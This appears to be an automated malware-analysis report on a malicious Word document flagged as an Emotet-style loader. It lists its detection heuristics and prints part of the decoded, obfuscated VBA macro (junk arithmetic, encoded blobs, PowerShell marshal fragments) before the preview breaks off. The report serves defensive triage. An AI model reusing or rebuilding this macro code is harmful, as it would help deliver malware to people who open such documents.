Verdict: MALICIOUS
Risk Score: 264
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
The sample contains a legacy WordBasic AutoOpen macro and obfuscated VBA code, indicated by multiple high-severity heuristics including OLE_VBA_AUTOOPEN and OLE_VBA_PCODE_AUTOEXEC_EXEC. The presence of CreateObject suggests the macro attempts to instantiate objects to perform malicious actions, likely downloading a second-stage payload. The ClamAV detection 'Doc.Malware.Emodldr-10025032-0' further confirms its malicious nature.
Heuristics (9)
- ClamAV: Doc.Malware.Emodldr-10025032-0 (critical, `CLAMAV_DETECTION`): ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
- Password-protected archive handoff (high, `SE_PASSWORD_ARCHIVE_LURE`): Document gives password instructions for an archive or attachment, a technique often used to keep payloads encrypted until after gateway scanning
- VBA macros detected (medium, `OLE_VBA_MACROS`, 3 related findings): Document contains VBA macro code
- AutoOpen macro (high, `OLE_VBA_AUTOOPEN`): AutoOpen macro
- CreateObject call (high, `OLE_VBA_CREATEOBJ`): CreateObject call
- VBA p-code auto-exec with execution tokens (high, `OLE_VBA_PCODE_AUTOEXEC_EXEC`): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, `OLE_LEGACY_WORDBASIC_AUTOEXEC`): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, `EXTRACTED_FILE_STATIC_TRIAGE`): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, `EMBEDDED_URL`): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 28817 bytes |

SHA-256: 2182e78ee5ad3aefa6492552df1eb7e01dec29d3d143674b20849ab83359c67d

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 26 long base64-like blobs)
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "vZMDsqdMREU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "YVdNdKnW"
Function vTpujOlEJrMMD()
On Error Resume Next
Set GoBCP = EEANlu
iVztjJ = 76056 + 99495
wdIvD = 92138 / NbULVk
TSwwnWCp = zzIXdi("nODUAOQBmADYAMgA3ADMAYwAyADQANAAxADkAOQA0ADkAZQBkAGUAZQBiADUAMwBmADYAMQA2AGYAMgA5ADMAMgBmADMAMgAzAGYANAAyAGYAMwBjAGQAYwBkAGMANATvwNi", 3, 125)
Set UtpwI = uUJNrl
pYftiZ = 12103 + 80042
uThIR = 73607 / QiPtDd
Set uDYIb = iaRnX
DQfioo = 56391 + 65618
jzjtmI = 81178 / QsfNlz
YsjiDRRGhjs = zzIXdi("Zjj3ADgANwA4AGEANAA2AGQAZQBhAGUAMwA4AGUAYwAyAGUAMQBmADIAYQAxAGYAZgAxADkAMABjADcAYgA5ADEANAAyADUcLoq%p", 4, 92)
Set sSzMH = qEBcaA
SRMWc = 56464 + 27969
sPpCo = 52940 / vskRR
Set BJEjY = DmDjQ
Sluat = 99132 + 6042
mdqzt = 9517 / isaZU
HEAfBTBRv = zzIXdi("dEw5wHAMwAyADMAMgAxADcAMgBhADEAZgBmADMANgBiAGEAZABjAGUAOABmADIANQA4Aq0i", 7, 62)
Set rBGfPl = nDOzr
NPouiD = 42371 + 25661
XSGpT = 77104 / udGvY
Set iqAiL = HzXkb
dwsic = 16174 + 61097
pbVDuz = 73971 / kTKkn
NKpLaR = zzIXdi("X%whAGYAOABhADcAMgA1ADkAYgA1ADcAZgBiAGYAOAA1ADYAZAAxADkAYwA2AGMAOQAwAGQAYwA2ADUAYgAyADMAZgBjADIAOQBmADgAZQBhADIAZQA0ADgAOAA0ADAANQBmAGYANwBmADgAYQBiADAAot2J", 4, 149)
Set ZGDjOY = LwVAnU
ndGipj = 68687 + 6681
wjLSC = 27911 / ZrNfX
Set MHIzQN = XdBpA
MRWZwZ = 25254 + 96600
zYkQzv = 78681 / VzqJj
OJdzRXHLU = zzIXdi("pMNmGUAYQBkADMANQBjAGUAMQBjADkAMQAwADEAMQAwAGEAYwAzADEANQA3AGUANABhADAAZgA5AGQANQA2AGIAMAAyAGMANQAyAGUAMAA3ADUAZgBmAGMAYQBkADEAYQBhADYAMwA0AOw", 5, 136)
Set JDlKi = XwrnF
PUoRjo = 79583 + 59160
jMzOY = 65779 / jsKoc
Set twJkiY = wAOXYm
VwjZU = 77643 + 55177
cQUYSv = 92773 / IAddmL
CYmidNd = zzIXdi("Xfp2A5AGQAYgBmADIAMgBhADIAZQAyADMAYwAxAGMANwBjADcAMQA1AGEAZgBhADEAMQAwADMAYgBmADUAYgAyAGEANwBlAGMANgA0ADcAMAA1ADcAZQBhADEAOABhADAANwAyADEAZQBjADEANAAyAGYAMABkADMAYQA5AGMAYQBjAGIAMgA2AGIAYQBmAYaz", 5, 187)
Set mqNDf = OWczQ
wiJsTW = 87163 + 39318
QKFjzT = 11026 / uJjJl
Set niiCk = mzXsRZ
UHhBBO = 97622 + 71774
NMhrJU = 14181 / waFuan
lJrVOhN = zzIXdi("jQNgBkAGUANgA2ADIAZQA2ADIAYwA3AGEAYQA3ADMAZQAwADMAYQA4ADcAMQAyADUAMQBkADQAZAA5ADk8KbK", 3, 79)
Set CLNwV = uqzkGa
iSizTK = 34143 + 34894
tnSpp = 89125 / UsuUjz
Set IzDlzS = hGSQDE
SQiZiY = 85436 + 68896
ZLoCti = 56353 / XsmKl
ihkMA = zzIXdi("7ABhADgAYgA5AGYAZQAwAGEAOQA5AGQAOAAxADQAYgA2ADMAYgBmAGUAMwBjADQAMwBlADYANwAxAGUAZgAyADIANgBlADAANwAzADUAMAAwAGQAZAA1ADgAYQA5ADgAMgBkADQAOABmAGMAOQBlADQANwAzADAAZgBlAGIANAA0ADAAMgBiA3 0CSA", 2, 180)
Set fXkmKh = AzGfF
nMLGwY = 21740 + 58849
KQhCdG = 84954 / RUjTC
Set pkaNz = McQNb
OmTjo = 77101 + 45236
qtjhc = 56731 / QhGAUd
UnwwF = zzIXdi("aDEANQA0AGMANQA2ADAAZQAyAGYAZQBjADkAOABhAGUAZABjAGIANAA1ADcANgAxADIAMgBkADQAOQA0ADUAOQAxADYAOQAxADAAMgAwAGMAZgBhAGMANgA2AGYAYQA4ADYAZQAxADgAYQBiADkAYgA2ADcAMABhADYAMQA0AD,lL@P", 2, 169)
Set IFDSbi = nFjkwQ
XPdmr = 51028 + 40430
BtlVhw = 90958 / MHoXd
Set DFGOaz = iOOUwW
YANUUQ = 44734 + 11427
Pbmpp = 37082 / LLEpwK
FLvvIwF = zzIXdi("%M3DgANgA1ADYAZQBkADYAMQAwAGEAYgA5AGEANwA5ADgAZQBiADUAMABiAGYAZAA2AGMAYwBmADcAOmsMv", 4, 76)
Set HMJBA = dOVwcD
VzTJZz = 81314 + 82842
oIvPUD = 17999 / hsNwFH
Set VoXFw = jjocA
vwfIwn = 30453 + 16664
uCiUMj = 76068 / jADfd
criKITKVF = zzIXdi("MnUGQAOQBiADUAYwA4AGEAMQAwAGIAMQA0ADAANQAyADUAYwA1ADUAZQBmAGEANwAxADMAYgBmAGMANAB2UfM", 4, 78)
Set wMEKj = cHBWiA
cLmKw = 6063 + 45851
mtkkZt = 23321 / bwNSh
Set XhVCN = Pmnhj
bTmTf = 76543 + 83434
CLDfu = 63077 / EMiCC
Whitj = zzIXdi("wj5R([RunTImE.IntEROpsERVICES.MaRsHAL]::([rUntiMe.inTEROPsERViCEjiV1J", 5, 60)
Set qCwDA = ijzmA
IlzJic = 3934 + 82780
wLdpIh = 12191 / aIfjF
Set EtUVum = cYpiZ
FzRJh = 81378 + 26194
sqwor = 96028 / mzHnSw
thENAuOMwi = zzIXdi("57RpRkEAZQBjADcAZQA4ADIANQA2ADgANAAyADMAMwBmADIAYgA1ADQAOABhADQAYwAzADkAMABlAGUANAAxAGYAYwBlAGQANQBmADkAZgBmADEAMABlADgAZABiA,ip", 7, 119)
Set dhSzB = BVtMJl
dtwqqw = 58009 + 23614
VjCoQ =
```

... (truncated)